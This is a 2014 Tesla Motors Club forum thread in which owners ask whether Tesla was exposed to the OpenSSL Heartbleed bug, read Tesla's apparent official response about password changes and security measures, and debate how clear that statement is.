Welcome to Tesla Motors Club
Discuss Tesla's Model S, Model 3, Model X, Model Y, Cybertruck, Roadster and More.
Register
  • We just completed a significant update, but we still have some fixes and adjustments to make, so please bear with us for the time being. Cheers!

Accounts affected by Heartbleed bug?

anticitizen13.7

anticitizen13.7

Not posting at TMC after 9/17/2018
Dec 22, 2012
3,638
5,761
United States
I'm sure most people here are aware of the OpenSSL bug called "Heartbleed" that made headlines last week (http://arstechnica.com/information-...xplains-openssl-mistake-that-put-web-at-risk/ for a recap).

Did Tesla have any response to this? They might not have been affected, but given that some Model S functions can be activated via mobile phone app, it might be prudent to check.

Hopefully the Hacker Princess is keeping things safe at Tesla.
 
A

alset

Member
Sep 7, 2012
162
8
Boston
Unclear if Tesla uses OpenSSL and if so, what version:
LastPass - LastPass Heartbleed checker

Tesla should really post something in their blog about it. There's a decent chance they'll recommend everyone to change their password but we need to be sure they're not running a vulnerable server first. If they're not vulnerable, I'd also love to know why (but we might not get that info).

On a related note, anyone who shared their password with other sites that bridged over to the Tesla REST APIs should probably be discussed here too. I don't know what the sites are but a comment from the site maintainers would be good.
 
TM Ownership

TM Ownership

Member
Apr 15, 2014
13
140
Palo Alto, CA
Over the past week, there has been lots of online news regarding a security vulnerability within versions of OpenSSL, known as the Heartbleed Bug. After a comprehensive review of our services by our dedicated team of information security professionals, we would like to report that we have not found any evidence of compromised exposure to the OpenSSL vulnerability and that our systems, including our website and vehicle related resources, are not using a version vulnerable to the Heartbleed Bug. Your account details remain secure. Regardless, we recommend that our customers change their passwords as an added precaution.

Whether it’s developing the car that has the highest safety rating or doing everything in our power to protect our customers against online incursions, security is Tesla’s top priority. Our dedicated team of best-in-class information security professionals protect our products and systems from vulnerabilities on an ongoing basis, and we continue to work with security researchers around the world who are incentivized to report any potential issues. To offer customers an extra level of confidence, two weeks ago, we updated our minimum password requirements from six to eight characters, and we encourage the use of passwords that are considerably stronger. We have also implemented a password lockout feature that requires MyTesla account holders to reset their passwords via our website after five failed login attempts.
We have taken these steps because we consider the security of the website and mobile application of paramount importance. Just as we encourage customers to protect their MyTesla credentials with the same care they would dedicate to any of their other accounts (online or otherwise) with sensitive information, we are committed to doing what we can to ensure the maximum level of protection. It’s also important to note that, in case customers remain concerned about general online or mobile app security, we have given Model S owners the option of disabling mobile access through the Controls menu on the car’s touchscreen.

We strongly encourage anyone to report security issues on any of Tesla’s products via the Responsible Reporting process on our website:https://www.teslamotors.com/about/legal#security-vulnerability-reporting....
Through that process, we offer a range of rewards to security researchers who report valid issues to help us bolster online security and further protect our products.
 
Last edited by a moderator:
Hybris

Hybris

Member
Sep 14, 2013
445
0
Sweden
please also add SMS OTP option for the website, a pincode lock in the car for changing settings (to protect when valet, detailer etc), add GPS ringfencing function to the car. meaning I get an alarm if the car moves more than x meter/km in the phoneapp.
 
A

alset

Member
Sep 7, 2012
162
8
Boston
TM Ownership said:
Over the past week, there has been lots of online news regarding a security vulnerability within versions of OpenSSL, known as the Heartbleed Bug. After a comprehensive review of our services by our dedicated team of information security professionals, we would like to report that we have not found any evidence of compromised exposure to the OpenSSL vulnerability and that our systems, including our website and vehicle related resources, are not using a version vulnerable to the Heartbleed Bug. Your account details remain secure. Regardless, we recommend that our customers change their passwords as an added precaution.
Click to expand...

First of all, credit to TM Ownership (and presumably internal security staff) for responding to this. The password requirement improvements and communicating a vulnerability reporting process is progress.

However, this post really feels like an earnest communication effort from a security department overly edited by a marketing department, removing the ability to know the precise security situation. By 4/15, it is clear that most web sites that were vulnerable to Heartbleed were no longer running the vulnerable versions of OpenSSL, nor had they any evidence of exposure. (There would typically not be any evidence left in a successful exploit of Heartbleed.)

What would be a better statement to make is whether Tesla was running a vulnerable version of OpenSSL during this period and that it was patched since. In that scenario, there was clear possibility of a leak and we should definitely rotate passwords - indeed many sites are requiring it. Given that you recommend that we all rotate passwords, I assume that is the case but it's a pity you are not clearer on the subject, as many web sites have been.

These two statements seem in conflict in the context of Heartbleed:
> Your account details remain secure.
> we recommend that our customers change their passwords as an added precaution.

How do you know our account details remain secure if there was ever Heartbleed exposure? If there was never exposure, please say so.

Thank you!
 
Kraken

Kraken

Member
Nov 20, 2012
799
7
Voltageville, CA
Seemed simple to me. Perhaps a security risk at another site exposed someone's password there. Perhaps some people use the same passwords at Tesla too. Sounds like CYA to me.
 
anticitizen13.7

anticitizen13.7

Not posting at TMC after 9/17/2018
Dec 22, 2012
3,638
5,761
United States
alset said:
First of all, credit to TM Ownership (and presumably internal security staff) for responding to this. The password requirement improvements and communicating a vulnerability reporting process is progress.

However, this post really feels like an earnest communication effort from a security department overly edited by a marketing department, removing the ability to know the precise security situation. By 4/15, it is clear that most web sites that were vulnerable to Heartbleed were no longer running the vulnerable versions of OpenSSL, nor had they any evidence of exposure. (There would typically not be any evidence left in a successful exploit of Heartbleed.)

What would be a better statement to make is whether Tesla was running a vulnerable version of OpenSSL during this period and that it was patched since. In that scenario, there was clear possibility of a leak and we should definitely rotate passwords - indeed many sites are requiring it. Given that you recommend that we all rotate passwords, I assume that is the case but it's a pity you are not clearer on the subject, as many web sites have been.

These two statements seem in conflict in the context of Heartbleed:
> Your account details remain secure.
> we recommend that our customers change their passwords as an added precaution.

How do you know our account details remain secure if there was ever Heartbleed exposure? If there was never exposure, please say so.

Thank you!
Click to expand...

This is a good point. Extra clarification would be welcome.

I believe that the recommendation that customers change passwords exists because there are many people who use the same password for multiple sites, despite the practice being generally discouraged. If someone has used the password they use for Tesla on another website that was affected by Heartbleed, a hacker could conceivably have stolen the password and might try it on the Tesla website. EDIT - Kraken beat me to it. Should have read through the whole thread, LOL.
 

Similar threads

FlyinLow
What to expect during a software update
Replies
12
Views
4K
Model S: User Interface
FlyinLow
FlyinLow
SeBsZ
Anyone willing to beta test my Android app/website TesLender.com?
Replies
2
Views
578
Model S: User Interface
SeBsZ
SeBsZ
D
Tunein podcast Loading Error
Replies
21
Views
5K
Model S: User Interface
jeffdom1978
J
Co-pilot Jeff
Co-pilot for Tesla app - Official Thread
Replies
4
Views
2K
Model S: User Interface
Co-pilot Jeff
Co-pilot Jeff
N
Software Update 2018.39 4a3910f (plus other v9.0 early access builds)
Replies
2K
Views
285K
Model S
Koteyko
K

About Us

Formed in 2006, Tesla Motors Club (TMC) was the first independent online Tesla community. Today it remains the largest and most dynamic community of Tesla enthusiasts. Learn more.

Meta

Contact Us
Advertise with Us
Become a Vendor
Terms of Service
Privacy Policy
DMCA Notice

Do you value your experience at TMC? Consider becoming a Supporting Member of Tesla Motors Club. As a thank you for your contribution, you'll get nearly no ads in the Community and Groups sections. Additional perks are available depending on the level of contribution. Please visit the Account Upgrades page for more details.


SUPPORT TMC
Copyright © 2006-2021 Tesla Motors Club LLC. All rights reserved.
Tesla Motors Club LLC (TMC) is an independent enthusiast organization and is not affiliated with Tesla Motors, Inc. or its subsidiaries. TESLA, TESLA MOTORS, TESLA ROADSTER, MODEL S, MODEL X, and the “TESLA,” “T” and “TESLA and T in Crest” designs are trademarks or registered trademarks of Tesla Motors, Inc. in the United States and other countries.
Top